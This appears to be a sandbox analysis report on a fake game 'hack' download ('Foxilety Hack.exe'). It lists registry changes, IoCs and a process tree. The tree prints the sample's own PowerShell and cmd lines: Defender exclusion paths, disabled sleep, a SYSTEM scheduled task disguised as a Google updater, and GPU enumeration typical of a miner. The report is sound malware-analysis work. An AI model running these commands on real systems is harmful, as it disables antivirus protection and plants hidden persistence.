Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\웠쓷最耀厈꿒翻\ = "rar_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ɐះǯ\ = "rar_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\웠쓷最耀厈꿒翻	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Applications\7zFM.exe\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\""	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\웢쓱栀耀	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\rar_auto_file\shell	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\印꿒翻\ = "rar_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\rar_auto_file\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\""	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Applications\7zFM.exe\shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.rar	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\였ᴝǯ	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exe

pid	process
4624	powershell.exe
4624	powershell.exe
2176	powershell.exe
2176	powershell.exe
4168	powershell.exe
4168	powershell.exe
1624	powershell.exe
1624	powershell.exe
4204	powershell.exe
4204	powershell.exe
1312	powershell.exe
1312	powershell.exe
4608	powershell.exe
4608	powershell.exe
2608	powershell.exe
2608	powershell.exe
4572	powershell.exe
4572	powershell.exe
1888	powershell.exe
1888	powershell.exe
4244	powershell.exe
4244	powershell.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe
5024	conhost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

OpenWith.exe7zFM.exe

pid process

4540 OpenWith.exe
780 7zFM.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

636

pid	process
4540	OpenWith.exe
780	7zFM.exe

pid	process
636

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeRestorePrivilege	780	7zFM.exe
Token: 35	780	7zFM.exe
Token: SeSecurityPrivilege	780	7zFM.exe
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeShutdownPrivilege	4264	powercfg.exe
Token: SeCreatePagefilePrivilege	4264	powercfg.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeShutdownPrivilege	732	powercfg.exe
Token: SeCreatePagefilePrivilege	732	powercfg.exe
Token: SeShutdownPrivilege	5068	powercfg.exe
Token: SeCreatePagefilePrivilege	5068	powercfg.exe
Token: SeShutdownPrivilege	1484	powercfg.exe
Token: SeCreatePagefilePrivilege	1484	powercfg.exe
Token: SeIncreaseQuotaPrivilege	2176	powershell.exe
Token: SeSecurityPrivilege	2176	powershell.exe
Token: SeTakeOwnershipPrivilege	2176	powershell.exe
Token: SeLoadDriverPrivilege	2176	powershell.exe
Token: SeSystemProfilePrivilege	2176	powershell.exe
Token: SeSystemtimePrivilege	2176	powershell.exe
Token: SeProfSingleProcessPrivilege	2176	powershell.exe
Token: SeIncBasePriorityPrivilege	2176	powershell.exe
Token: SeCreatePagefilePrivilege	2176	powershell.exe
Token: SeBackupPrivilege	2176	powershell.exe
Token: SeRestorePrivilege	2176	powershell.exe
Token: SeShutdownPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeSystemEnvironmentPrivilege	2176	powershell.exe
Token: SeRemoteShutdownPrivilege	2176	powershell.exe
Token: SeUndockPrivilege	2176	powershell.exe
Token: SeManageVolumePrivilege	2176	powershell.exe
Token: 33	2176	powershell.exe
Token: 34	2176	powershell.exe
Token: 35	2176	powershell.exe
Token: 36	2176	powershell.exe
Token: SeIncreaseQuotaPrivilege	2176	powershell.exe
Token: SeSecurityPrivilege	2176	powershell.exe
Token: SeTakeOwnershipPrivilege	2176	powershell.exe
Token: SeLoadDriverPrivilege	2176	powershell.exe
Token: SeSystemProfilePrivilege	2176	powershell.exe
Token: SeSystemtimePrivilege	2176	powershell.exe
Token: SeProfSingleProcessPrivilege	2176	powershell.exe
Token: SeIncBasePriorityPrivilege	2176	powershell.exe
Token: SeCreatePagefilePrivilege	2176	powershell.exe
Token: SeBackupPrivilege	2176	powershell.exe
Token: SeRestorePrivilege	2176	powershell.exe
Token: SeShutdownPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeSystemEnvironmentPrivilege	2176	powershell.exe
Token: SeRemoteShutdownPrivilege	2176	powershell.exe
Token: SeUndockPrivilege	2176	powershell.exe
Token: SeManageVolumePrivilege	2176	powershell.exe
Token: 33	2176	powershell.exe
Token: 34	2176	powershell.exe
Token: 35	2176	powershell.exe
Token: 36	2176	powershell.exe
Token: SeIncreaseQuotaPrivilege	2176	powershell.exe
Token: SeSecurityPrivilege	2176	powershell.exe
Token: SeTakeOwnershipPrivilege	2176	powershell.exe
Token: SeLoadDriverPrivilege	2176	powershell.exe
Token: SeSystemProfilePrivilege	2176	powershell.exe
Token: SeSystemtimePrivilege	2176	powershell.exe
Token: SeProfSingleProcessPrivilege	2176	powershell.exe
Token: SeIncBasePriorityPrivilege	2176	powershell.exe
Token: SeCreatePagefilePrivilege	2176	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

iexplore.exe7zFM.exe

pid process

1576 iexplore.exe
1576 iexplore.exe
780 7zFM.exe
780 7zFM.exe

Suspicious use of SetWindowsHookEx 29 IoCs

Processes:

iexplore.exeIEXPLORE.EXEOpenWith.exeFoxilety Hack.exeFoxilety Hack.exeFoxilety Hack.exe

pid	process
1576	iexplore.exe
1576	iexplore.exe
3076	IEXPLORE.EXE
3076	IEXPLORE.EXE
3076	IEXPLORE.EXE
3076	IEXPLORE.EXE
3076	IEXPLORE.EXE
3076	IEXPLORE.EXE
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
4540	OpenWith.exe
3660	Foxilety Hack.exe
3020	Foxilety Hack.exe
1140	Foxilety Hack.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exeOpenWith.exeFoxilety Hack.execmd.exepowershell.exeFoxilety Hack.execmd.exeupdater.exeFoxilety Hack.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1576 wrote to memory of 3076	1576	iexplore.exe	IEXPLORE.EXE
PID 1576 wrote to memory of 3076	1576	iexplore.exe	IEXPLORE.EXE
PID 1576 wrote to memory of 3076	1576	iexplore.exe	IEXPLORE.EXE
PID 4540 wrote to memory of 780	4540	OpenWith.exe	7zFM.exe
PID 4540 wrote to memory of 780	4540	OpenWith.exe	7zFM.exe
PID 3660 wrote to memory of 4624	3660	Foxilety Hack.exe	powershell.exe
PID 3660 wrote to memory of 4624	3660	Foxilety Hack.exe	powershell.exe
PID 3660 wrote to memory of 4948	3660	Foxilety Hack.exe	cmd.exe
PID 3660 wrote to memory of 4948	3660	Foxilety Hack.exe	cmd.exe
PID 3660 wrote to memory of 2176	3660	Foxilety Hack.exe	powershell.exe
PID 3660 wrote to memory of 2176	3660	Foxilety Hack.exe	powershell.exe
PID 4948 wrote to memory of 4264	4948	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 4264	4948	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 732	4948	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 732	4948	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 5068	4948	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 5068	4948	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 1484	4948	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 1484	4948	cmd.exe	powercfg.exe
PID 3660 wrote to memory of 4168	3660	Foxilety Hack.exe	powershell.exe
PID 3660 wrote to memory of 4168	3660	Foxilety Hack.exe	powershell.exe
PID 4168 wrote to memory of 1512	4168	powershell.exe	schtasks.exe
PID 4168 wrote to memory of 1512	4168	powershell.exe	schtasks.exe
PID 3020 wrote to memory of 1624	3020	Foxilety Hack.exe	powershell.exe
PID 3020 wrote to memory of 1624	3020	Foxilety Hack.exe	powershell.exe
PID 3020 wrote to memory of 1396	3020	Foxilety Hack.exe	cmd.exe
PID 3020 wrote to memory of 1396	3020	Foxilety Hack.exe	cmd.exe
PID 3020 wrote to memory of 4204	3020	Foxilety Hack.exe	powershell.exe
PID 3020 wrote to memory of 4204	3020	Foxilety Hack.exe	powershell.exe
PID 1396 wrote to memory of 2836	1396	cmd.exe	powercfg.exe
PID 1396 wrote to memory of 2836	1396	cmd.exe	powercfg.exe
PID 1396 wrote to memory of 1796	1396	cmd.exe	powercfg.exe
PID 1396 wrote to memory of 1796	1396	cmd.exe	powercfg.exe
PID 1396 wrote to memory of 3412	1396	cmd.exe	powercfg.exe
PID 1396 wrote to memory of 3412	1396	cmd.exe	powercfg.exe
PID 1396 wrote to memory of 4968	1396	cmd.exe	powercfg.exe
PID 1396 wrote to memory of 4968	1396	cmd.exe	powercfg.exe
PID 1528 wrote to memory of 1312	1528	updater.exe	powershell.exe
PID 1528 wrote to memory of 1312	1528	updater.exe	powershell.exe
PID 1140 wrote to memory of 4608	1140	Foxilety Hack.exe	powershell.exe
PID 1140 wrote to memory of 4608	1140	Foxilety Hack.exe	powershell.exe
PID 3020 wrote to memory of 2608	3020	Foxilety Hack.exe	powershell.exe
PID 3020 wrote to memory of 2608	3020	Foxilety Hack.exe	powershell.exe
PID 1140 wrote to memory of 2404	1140	Foxilety Hack.exe	cmd.exe
PID 1140 wrote to memory of 2404	1140	Foxilety Hack.exe	cmd.exe
PID 1140 wrote to memory of 4572	1140	Foxilety Hack.exe	powershell.exe
PID 1140 wrote to memory of 4572	1140	Foxilety Hack.exe	powershell.exe
PID 2404 wrote to memory of 1588	2404	cmd.exe	powercfg.exe
PID 2404 wrote to memory of 1588	2404	cmd.exe	powercfg.exe
PID 2608 wrote to memory of 4580	2608	powershell.exe	schtasks.exe
PID 2608 wrote to memory of 4580	2608	powershell.exe	schtasks.exe
PID 2404 wrote to memory of 4044	2404	cmd.exe	powercfg.exe
PID 2404 wrote to memory of 4044	2404	cmd.exe	powercfg.exe
PID 2404 wrote to memory of 620	2404	cmd.exe	powercfg.exe
PID 2404 wrote to memory of 620	2404	cmd.exe	powercfg.exe
PID 2404 wrote to memory of 3160	2404	cmd.exe	powercfg.exe
PID 2404 wrote to memory of 3160	2404	cmd.exe	powercfg.exe
PID 1140 wrote to memory of 1888	1140	Foxilety Hack.exe	powershell.exe
PID 1140 wrote to memory of 1888	1140	Foxilety Hack.exe	powershell.exe
PID 1888 wrote to memory of 3096	1888	powershell.exe	schtasks.exe
PID 1888 wrote to memory of 3096	1888	powershell.exe	schtasks.exe
PID 1528 wrote to memory of 4564	1528	updater.exe	cmd.exe
PID 1528 wrote to memory of 4564	1528	updater.exe	cmd.exe
PID 1528 wrote to memory of 4244	1528	updater.exe	powershell.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://bit.ly/3wqtWLQ
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1576

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1576 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3076

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4540

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G3YCTSQY\FoxiletyHack.rar"
2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:780

C:\Users\Admin\Desktop\Foxilety Hack.exe
"C:\Users\Admin\Desktop\Foxilety Hack.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4624

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:4948

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4264

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:732

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5068

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#nhmno#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#rwbmct#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4168

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1512

C:\Users\Admin\Desktop\Foxilety Hack.exe
"C:\Users\Admin\Desktop\Foxilety Hack.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1624

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:2836

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:1796

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3412

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:4968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#nhmno#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#rwbmct#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:4580

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1312

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4564

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:2212

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:1304

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:4208

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:4584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#nhmno#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4244

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe puhcvvbubzi
2⤵
PID:4336

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:1660

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:3648

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:4756

C:\Windows\system32\conhost.exe
